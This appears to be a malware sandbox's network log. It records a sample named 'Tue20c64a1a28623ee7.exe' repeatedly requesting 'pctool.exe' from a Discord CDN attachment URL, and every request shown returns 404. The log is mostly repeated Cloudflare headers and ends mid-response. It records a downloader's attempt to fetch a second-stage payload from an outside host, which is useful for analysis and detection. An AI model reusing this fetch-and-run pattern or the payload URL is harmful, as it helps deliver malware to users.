Set-Cookie: __cf_bm=0BgWo17XoGigNYR.OZMpF_T6M5TREr.FCR4Ltkl.XWk-1734985241-1.0.1.1-DQ48aVfDKTIdjtlgWU_AYkWWXv_U51O_xepwOpkGWyz_vASs4Q4rHRS5b.1KPv7tZOH.DSRJN7EkE8vHGbTJPA; path=/; expires=Mon, 23-Dec-24 20:50:41 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMPjcjra%2FyyPegp%2BS6D9UT3sYBWGsrsufldk6Qo%2F5%2Fu40CZaMdAdvyQ9rNke5pn3bAzW3ibi8OPUJ7d3T6sUFWFEzTIaxNVDeZhZytuMtBEIBvq06JcSX%2FmIedIfCy5PhORnRg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=O8TX3OW.KX83q5pBiWkVrdCdZJKeM9w7lcSyKS3D3DM-1734985241474-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0dbf28d071ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:46 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=3bCT9FUdQ1z_dhFFBqHOPELmIh2U191fSS_lcvPkmuo-1734985246-1.0.1.1-qvsL3RyngAZUFjH8LDlqpCzbGL6GP.vx4G24xohRebDI4bgCR0rWhIuDadzlzFyPDnFdJVvSRZgBvcUCMkqgKg; path=/; expires=Mon, 23-Dec-24 20:50:46 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzAySgmh%2Bnj7lqfv2ENMk%2Be0CUYboo5GkDnYbcakrrd3fUhwbfVbjiv18gY6g%2F3QIPlO1sDyToRIeDWf7lP03Q9PVQUchQOqfy7Zi9LanXKel8uVy6k76IGbKlSlRm3GcOVFzA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=TsHHe3dW3tIVOcT9mu6hKByXGyWDaVeB_NrtwzZ5674-1734985246545-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0ddece7271ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:51 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=TzZ6EFi45zqr7sC4moKq8.Dcp9Ye13tG_egtBn2z6hM-1734985251-1.0.1.1-VRtPeu9Awxnv0gaMoxCOuk7wPxWnApfTvwjnSEBMykcLqUwhxxe8NkQaZPo9O76b8AKIsnhDVf5yGYk9nz3KXw; path=/; expires=Mon, 23-Dec-24 20:50:51 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFUgFcPs3kw9%2BrEHlPQtYTZ3XIXsG4Y7xeWhCnE9cuB5Qz1WHSnAA2KkWk6mHtFnU5BqjiwtCMUX10BMnwXPGkyTxIYhduPZOOuqmsKEH5jCPBWD1hHSC0B2fs8Rx7Zt2VKoyA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=FL0By_eBR8gG_OCKb1wbdp9sVgFDMQojGkn8PwfYl5E-1734985251634-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0dfe8ad771ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:56 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=mtF3yEncsWVQK2o8FO6hqb6uojKTzDgRVD2i.DztAPk-1734985256-1.0.1.1-iuFeoneWx.bgolrUdiO9jReYxPfj.DmLfNHwynVXcMciRpVbxtFxcknQhvkCMYYbDTuFoXnXE0xDpGTxhPgXAA; path=/; expires=Mon, 23-Dec-24 20:50:56 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCRu1zg31JngJtvWgmGMQn1sxx1RUn6lC4woLYtmfGBW58gKUtfETbcj%2BU4ucLptKNO7uWVrUNM1xiGKRxJFyB50lChgGSWYTDb3KF3%2BhEI80Y0BqpLb%2BzfP3XYh6m7XMJdToQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=6ltPBE0QVzIEca5svusJArbAodihwG72SasjYLVklyM-1734985256713-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0e1e6efb71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:01 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=BJdd5HJmXAv1EE6_K0AmF_DPwapG4T2Qif.yNV2X1Cs-1734985261-1.0.1.1-.4Nyjy5DZljSJoG8lhP33BuknfWHCW2X5dwXAQks90Efx9exZy5_0iG4eixO6wZSj.9T24As_SG17ljMtG..Ow; path=/; expires=Mon, 23-Dec-24 20:51:01 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ddej3mLxj6PRerfoypnVVYVZ6K1EUd7MqmDzXMXq7iU33bXn5gRyxPo9%2BSvEcN%2FpvLiKDpLPOEjOka1fEUBPI2ZBYsziLbgE8%2Fd0%2Ba8XCgUhX%2BRW1HM8ArQDnX6hPdvlELYpig%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=fgUrMpOPpW3ULQVzop6CVvWMxRDbE56QkY7BpyFvgso-1734985261786-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0e3e1b9b71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:06 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=WlxQYscpeRjBHWMgtffLMPM5tjd6FrSQp67nhsIGFNA-1734985266-1.0.1.1-eNNGPKi6e1OWDEnjAd7vDlKzPZOi.k5TPnoTJuwU2OjcrPTtnPf282edi4zeT7Bzq3LEc7uDI5T6QN.FisIt6w; path=/; expires=Mon, 23-Dec-24 20:51:06 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KkXfcJCXbQQb6aqqC%2Bh9fERgrYu6XLVTQqlM47xTiDpZDISpHIAk%2Fg3sf%2F8Wua4EdEAC53Gh%2F9RvqMWYW0wNcmJgJKUjnadcUsR9yZ0187z0jv8Nd4TOdbKBBbK9c0tJuRRlvg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=7Yl7Oshc4aOHiZcbzg44pgepWEFief.G4NPSM0eWkrE-1734985266856-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0e5dc9b871ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:11 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=l94d_nO...iDETVLkW5a8iIpjRFEsjYGTDjkOB4XkRM-1734985271-1.0.1.1-nTRfnxkoc6yqDiO9Eyq8bT2eYs8jVePw__tU1dtEYw5ViGyqWDjm3.1VvjsX0r6v4Ohi0omjbYPZvAR9L.k_Lw; path=/; expires=Mon, 23-Dec-24 20:51:11 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVlaD%2B0ExeaTf5mvPUS%2FqWqMOcWT5GuRdVknRq340%2BAUYqCZdMB2TJM5VdH3LK%2FSbisUHnEa8WcTX50sqmVic7xlACv6yXQszKR%2Bp6eQeOymA9wQqvZaReHd03keCKZUDYc%2BUg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=Qc5Ma1s.jY41nTzY6Ja1vJZSlVTJPjprK1KXIQQOrBU-1734985271929-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0e7d7e0c71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:17 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=J0dXrho1mDDKV0m8KkNLtivsmhUup6fKxnOLJtv_LH4-1734985277-1.0.1.1-y5JZdYdCZBm1WDuVVAyrjRpUyEPQA2qy5g95VNj8Bl7KNSgFWbwrXLQP7byRFC6c4_ODzul5yABbctVMyOgizw; path=/; expires=Mon, 23-Dec-24 20:51:17 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sG8l1eFZAOM3V%2BMRRhlLEWXc5mvTNyGjTgXN7thSmZGby0GrR2pKwGpdP9mrzwVQ2MLJQUIzx778pm1f7K16Xv4%2Bz4qJQXD%2FTHqGUW1PAR3ENtguHdoiW8kb2tRaS4SFcFGfg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=ygibZP9s3GXPOCjcAQMbKE.NiznYE9Xm0v9BH0bsKdk-1734985277002-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0e9d2b1471ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:22 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=F0eRu9VyRzAr23UPJFAIaqpXJsswpLFIseZ6kTmGjsY-1734985282-1.0.1.1-CoAW2jmKuxkmEmAQB_iyW2IjGRpmE1bQMZGXyJdf8LG.dXsz0OkyzzaGSHoCo3Z.uuobNznwqhvRib33ET3kUg; path=/; expires=Mon, 23-Dec-24 20:51:22 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pvx1LxhcUWyXTeSm8TQETwo6h8V3Yx4%2FSECDPsbMvQEQLZj6dlaRTVARjxVyA%2FuxbXk1G337SQJA%2BTxszFi%2Ff4cPxYZcJZ9yC1EHJeu1CkDC6LhqNonNdOARXsu3IZv0R19bCw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=_KaGP0EhhMubz0CQUHdDduLFpizp6MNkjTRWAU3LtWI-1734985282077-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0ebceea871ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:27 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=GZmXgcLhL_8jST4eGZjvF4zbp65R_uyJm2WEslBq9D8-1734985287-1.0.1.1-Gabc2IkfLkWOk.SiFkOnOwWh3ESlOiEgcaLIO1ng.DaKM79N2gprZXf9oFbQA0s_Xt4MAqkRk.NIkvpG.wROeQ; path=/; expires=Mon, 23-Dec-24 20:51:27 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDl7y5vAr8Qt%2BL8pMZBg70trrlzidefwBNhPKTndMEmDdNN5GMLVRgl8oQyJv0680djwmEfXMZCjLpZY8Kf9BTH7y8T%2BvJd5x3vVDE5xenbSchp4MrzVuaN6ZTL3yfiTdgkiNw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=8h9L06tiryOkUEHRTktfIvXVLffm3xuv26jnRf.VKIc-1734985287152-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0edc9d5b71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:32 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=6kGnMSklbvccDwyKKXlkiYSkoEQxORsMvFYOPvJF4Vk-1734985292-1.0.1.1-i0XWUkpR.jZgqJMKav1pR7YUvIK_1plp.LlqV.ZOIXb11b9peqfwBNjC7aZSexFQtYROqLDUH6fPYy9YDIjsMg; path=/; expires=Mon, 23-Dec-24 20:51:32 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91v7XVfUYQW%2BNEMdgpNtU17XBIPhc7NWJvYTe%2BsJfR419JBuKiRcy92oEoCHs013Yo1qKTi3wbP2BmdA57tnlTLCAnBkOHRxP6B6vy0uiyJAO%2Fj0lwueW%2BjrTlRtBOV081BCgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=zvYbO7b44XAUKq40Uok6ZlBvmjP6j4ZGCBxEnxz7k2U-1734985292221-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0efc49a071ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:37 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=zxLAioDxxkoYmSymNqVQ7oPfI3JUJgOf_L1m5GxD0Fg-1734985297-1.0.1.1-YlUDWoN6rFK6q7zp9wwLskLgRrB4.lvSnxnm6LoIHeXJRrDEd8WChvgDDKljQFrj1n0rZquEjVfXFS2Tl_Fyaw; path=/; expires=Mon, 23-Dec-24 20:51:37 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3agzUjVEORafmGgefZRyVp27c1wtFwSdytkh9jp3WhsWrISxGy8pMawuhHGQY8RSIn%2BbKhK2C2x1QAHFLLs7s%2F%2BQPFS%2BvzONm0JMp1%2FbdQOGN%2FIi%2FCDQJ2HnfEXckVTCRIxJ1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=OatcO4v3vth_7cJ8YpqW.EeuQO5FxsEvtTmt7XRAL84-1734985297293-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0f1bfe2871ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:42 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=A_pFQ9_GZX5kCWMwdk2Xvu2DBfvC56mRXt0Qrhk79DI-1734985302-1.0.1.1-3V6LRAM6Vu2eu8wdkXmkoliXEY56OpE9xCxi6uueo8s.cNGrikvbQkU1pHwMMwj4kObGr87fZlJlE7iD4Z8dFw; path=/; expires=Mon, 23-Dec-24 20:51:42 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHCfw3wZiEaaDf66%2FRb9DtPPy1Vu7cYewvGoiGI5KBLA%2BXDn6DRLJxeTM4c8Qxv5D1g1VohcrAeCupJ8kdYsAuuRs2eNyfpA2%2BPW3AV4PEDn57cB55atPUzOJhCgI41AlxCsyw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=LKLdUFQ4UwEZGoJb8e0ZQ5G6lYZgrVlg7B5i9sa3LcU-1734985302367-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0f3bbc8a71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:47 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=YwTkRCFCv7LCfHFmsgniC8tH7d19usrDFBaYDoZQ6Qs-1734985307-1.0.1.1-Wc15C0CkF0io5g8nef4oZlD72QRtp5QbDQQ7yRmWmIQHTeOuA9SYmyeE.gjehjDn_Ii8FaCfvIPm931QXSlhkQ; path=/; expires=Mon, 23-Dec-24 20:51:47 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oLO1v8RHZKkhmNf%2Bk354EbzyruXYzWXYGE2%2BU2TKha%2BFezPCSiErG8L9MFCryEAcI97%2Fh0%2FPye7f3jmTvLYLGibzxdJeJx%2B1EPJnUWYysqikPMaqXdx1jlgshXhbnTRoy0g45Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=vGVT8Cj7xZi1OQVHJuBEE_ch5zZ7X7jMX0yC.LtKNMg-1734985307474-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0f5b7a8d71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:52 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=wdVjZJgUawsU75F8N8uJvMmEbRqyHnr1GTp8nlYcJIk-1734985312-1.0.1.1-TwZLnvxstmDN3jX1cvouE3zOozB7.DPu.iQZi3u3qjRYNH1I5Qu0R2LROnnezhnwn3kbANYvm3UbhaUoIC73vA; path=/; expires=Mon, 23-Dec-24 20:51:52 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQoTPU7FpxYIXRf4KC%2FLaTBwUoF6357LW3RRVZNxDUAebYYaT3qJ8JMKL29ilOOJMtvKSDU3ZYmzMj1aXHQ4fwscknrcpt%2FLmtdiUk%2Fg3Bw8w24x1nUZU2tNT7VxB0Db15Iqvw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=N.CkorMHo5NkHIAfD0Sn1xubFWD9dBRwZo.qpp06VcE-1734985312552-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0f7b589c71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:21:57 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=GgDMgAve7CjG06lZG_vVBN_2SWe0JhWyLvaXly.B7Ds-1734985317-1.0.1.1-LCbH73Ve9srLWR92ENz8Z3XuV3O_S18UygT0BiTBTkZ5xkn1F3xMkLJ80YPgRsc40dJkV8e1AiRPPc5QjiGmXQ; path=/; expires=Mon, 23-Dec-24 20:51:57 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kesK6mqr7pMslhshdWcgFptPv2l0QEjSsKJG1qDO28CPd0LKZ32%2BuARrMftyb3zWA7JYEi3Aj79omSWms2iYpqWENpHGAxiHbwAq86dx4vY83%2FIeobmOA%2FGrwRR%2B5giLHlrsOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=jtf_sZEFuOMcPY.Hv9H3eD2EMIUE7j96X3dXsv6VOts-1734985317642-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0f9b289071ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:22:02 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=zGHqp98YlFReow9G9aG5qCASYhymC7ZLVULZ_iM3gBk-1734985322-1.0.1.1-2ed66Nfp0iFn2caCSrmghXOmqNF8wcUsDlGaTQp8FilJXzhEHu5Dj2tXcBgKzwSy5jA5gxKeInb9ypVf2LBoFQ; path=/; expires=Mon, 23-Dec-24 20:52:02 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ve0eRk9Fx%2B0TdyhtLPzr%2FYMdgVv0oUSDEl5RfT0ZMJzvY8Y5b1N6zHkUPPLT4TJDn0f9VEc4Dx2g4g4Sh04j%2Bx7%2FrZMwJb%2BHKO%2FnXMOeMtPDt5YwdjLA6eFaJvB6LXZqpPxgjw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=oikv1KoqH.sJJVLcBonrdvLvu9FLvn_i6SkkOTvxgVA-1734985322726-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0fbafa6271ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:22:07 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=eVvd7IEZ8kJantc7gXh_aEApQCs8IyFkRLgXnxezawU-1734985327-1.0.1.1-nC1QcujbzCjnPHdyrN96KYesceB6tZ0xU2txkv98Fvy4.WDANRh73z0WBFGk5VCd5Cl_FasIyvb_QEPiRk0OiA; path=/; expires=Mon, 23-Dec-24 20:52:07 GMT; domain=.discordapp.com; HttpOnly; Secure
